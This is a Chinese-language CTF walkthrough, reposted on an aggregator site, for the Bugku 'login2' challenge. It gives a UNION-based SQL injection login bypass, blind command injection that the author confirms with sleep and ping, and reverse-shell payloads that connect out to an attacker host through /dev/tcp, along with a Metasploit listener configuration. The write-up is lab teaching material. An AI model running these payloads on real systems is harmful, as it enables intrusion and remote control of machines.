美文网首页网络安全
Bugku CTF login2(SKCTF)

Bugku CTF login2(SKCTF)

作者: Visianlee | 来源:发表于2019-06-11 21:17 被阅读5次

    抓包获得源码

    $sql="SELECT username,password FROM admin WHERE username='".$username."'";
if (!empty($row) && $row['password']===md5($password)){
}

    代码中的单双引号的嵌套,其中username和password列名在数据库中是存字符串的,而字符串是需要用引号引起来的,不然会出错,这个能理解吧?这个时候最外面的双引号是具有解析变量的作用,而里面的单引号是给数据库语句用的,如果里面再用双引号就会跟最外面的双引号起冲突了,故用单引号。
    而我其中的两个变量username和password之所以用点号连接左右,是因为如果变量在单引号里面可能会不被解析出来,而被当成 一个字符串。

    这里可以看到它是分离式的验证,首先查询username的用户,然后拿出password再进行比较,一开始想着是注入出admin的密码,但发现可能没有这个用户,而且也找不到注入的poc。后来参考网上的writeup才知道正确的打开方式。

    username=' union select 1,md5(1)#&password=1

    执行这条语句时由于前面的username为空,所以没有数据返回,但后面的union select md5(1),md5(1)则会返回两个MD5(1)的值,然后password我们也置为1,从而绕过if语句的判断。

    还原语句为:

    SELECT username,password FROM admin WHERE username='a' union select 1,md5(1)-- -&password=1'

    此时我们可以 username='', 两个 sql 语句进行联合操作时,当前一个语句选择的内容为空, 我们这里就将后面的语句的内容显示出来

    演示一下原理:


    image.png

    所以本题中的SELECT username,password FROM admin WHERE username='a' union select 1,md5(1)-- 将会返回

    username password
    1 md5(1)

    这样就能使if判断为真
    if (!empty($row) && $row['password']===md5($password))

    进入下一个页面,可以进行命令执行


    image.png

    然后注意到了倒数第二行:sh -c ps -anx | grep 123,用grep命令对输入的内容从 sh -c ps -anx 的执行结果里面进行查找并输出。
    然后就测试下过滤了什么字符:| & || && ; %0a 测试时候问题来了——除了自带的进程回显之外其他都不会回显,于是导致能不能执行命令都无法判断。
    既然无法根据回显判断命令是否执行,那还可通过linux下的sleep命令测试是否执行:c=123 ; sleep 5,产生了延时,说明命令执行了。
    然后测试下它是否能连接外网:c=123 ; ping www.baidu.com,浏览器一直转圈圈的话就是ping执行了,能连外网。
    然后就好弄了,有个公网ip再用个反弹shell的姿势:bash -i >& /dev/tcp/ip/port 0>&1 就能getshell了。

    payload:
c=123 ; bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/6666 0>&1`

    vps的msf监听:

    use exploit/multi/handler
set payload linux/armle/shell/reverse_tcp
set lport 6666
set lhost xxx.xxx.xxx.xxx
set exitonsession false
exploit -j

    然后顺利getshell:


    image.png

    顺利getflag:

    最后不忘去看下出题师傅怎么控制回显的:

    <?php
if(isset($_POST['c'])){
        $cmd = $_POST['c'];
        exec('ps -aux | grep '.$cmd, $result);
        foreach($result as $k){
                if(strpos($k, $cmd)){
                        echo $k.'<br>';
                }
        }
}
?>

    另一种姿势


    image.png 
    nc -lvv 8888
|bash -i >& dev/tcp/123.206.86.106/8888 0>&1

    /bin/bash -i > /dev/tcp/attackerip/80800<&12>&1
    image.png
    image.png

    测试失败

    参考:
    https://delcoding.github.io/2018/03/bugku-writeup4/
    https://www.cnblogs.com/blili/p/9045280.html
    https://www.bugku.com/thread-80-1-1.html
    https://blog.csdn.net/zazazrt/article/details/87655154
    https://www.jianshu.com/p/6750db0943b7
    https://xz.aliyun.com/t/2549

    相关文章

      网友评论

        本文标题:Bugku CTF login2(SKCTF)

        本文链接:https://www.haomeiwen.com/subject/vvscfctx.html

        延伸阅读

        深度阅读

        • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

        栏目导航

        热点阅读

        网络安全

        关于我们|服务条款|联系我们|Bugku CTF login2(SKCTF)|投稿指南|网站地图|RSS订阅|排版工具|手机版

        提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

        Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

        备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

        本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

        所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!